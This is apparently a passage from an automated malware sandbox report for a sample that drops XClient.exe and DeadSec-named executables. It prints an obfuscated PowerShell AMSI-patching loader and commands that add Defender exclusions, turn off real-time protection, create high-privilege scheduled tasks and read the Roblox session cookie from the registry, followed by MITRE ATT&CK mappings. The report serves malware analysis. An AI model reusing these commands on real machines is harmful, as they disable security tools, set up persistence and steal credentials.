+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+'l',$wpdQgvzinM,$vKDQJdzZhUHcxb).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'ti'+[Char](109)+''+[Char](101)+''+','+''+'M'+'an'+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');Write-Output $FNlWDXhLNEf.CreateType();}$EeUsnCPsQHzJL=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+[Char](116)+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+'o'+'f'+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+'d'+''+[Char](115)+'');$WvdLDGOHBzEpPW=$EeUsnCPsQHzJL.GetMethod(''+'G'+''+'e'+''+'t'+''+[Char](80)+''+'r'+''+[Char](111)+'c'+'A'+''+[Char](100)+'dr'+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'St'+[Char](97)+'t'+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$xjLuGNtkNKzFGQQbgRE=oaSExpkudVCx @([String])([IntPtr]);$OShaGrHhfzBAuveWJhpeov=oaSExpkudVCx @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KRYKBJIXbGa=$EeUsnCPsQHzJL.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+[Char](111)+''+[Char](100)+'u'+'l'+''+[Char](101)+'H'+'a'+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'ern'+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$sqtVbxEkGcentu=$WvdLDGOHBzEpPW.Invoke($Null,@([Object]$KRYKBJIXbGa,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+[Char](76)+''+'i'+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+'y'+'A'+'')));$UzKPgwQTtnHpPBbHl=$WvdLDGOHBzEpPW.Invoke($Null,@([Object]$KRYKBJIXbGa,[Object]('V'+'i'+''+[Char](114)+'t'+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+'t'+[Char](101)+''+'c'+'t')));$fWasPGS=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sqtVbxEkGcentu,$xjLuGNtkNKzFGQQbgRE).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+'d'+'l'+'l');$JVdeMOyWmGqrvSAXn=$WvdLDGOHBzEpPW.Invoke($Null,@([Object]$fWasPGS,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+'a'+'n'+'B'+'u'+'ff'+'e'+''+[Char](114)+'')));$nmyhrEHocC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UzKPgwQTtnHpPBbHl,$OShaGrHhfzBAuveWJhpeov).Invoke($JVdeMOyWmGqrvSAXn,[uint32]8,4,[ref]$nmyhrEHocC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JVdeMOyWmGqrvSAXn,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UzKPgwQTtnHpPBbHl,$OShaGrHhfzBAuveWJhpeov).Invoke($JVdeMOyWmGqrvSAXn,[uint32]8,0x20,[ref]$nmyhrEHocC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](119)+''+[Char](119)+''+[Char](119)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1912
- C:\Users\Admin\AppData\Roaming\XClient.exe
  C:\Users\Admin\AppData\Roaming\XClient.exe
  2⤵
  - Executes dropped EXE
  PID:4900
- C:\Users\Admin\AppData\Roaming\XClient.exe
  C:\Users\Admin\AppData\Roaming\XClient.exe
  2⤵
  - Executes dropped EXE
  PID:3180

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1440
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  - Modifies registry class
  PID:2664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1592

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1600

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1856

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2028

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:1380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:316

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1788

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2160

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2260

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2764

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2820

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3016

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3372

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3488
- C:\Users\Admin\AppData\Local\Temp\rootkit.exe
  "C:\Users\Admin\AppData\Local\Temp\rootkit.exe"
  2⤵
  - Checks computer location settings
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:4376
- - C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
    "C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4056
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1812
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.DeadSecObbbfuscation.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2728
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3496
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:508
- - C:\Users\Admin\AppData\Local\Temp\Modify.exe
    "C:\Users\Admin\AppData\Local\Temp\Modify.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Modify.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2372
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1400
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5056
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5084
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:1808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1688
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2104
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4724
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1248
- - C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
    "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"
    3⤵
    - Executes dropped EXE
    PID:3580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3612

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3796

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3952

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:5004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2884

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:1944

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3324

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1872

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1700

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1464

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2832

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1460

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:2776

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
1⤵
PID:4220

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3676

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:2412

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery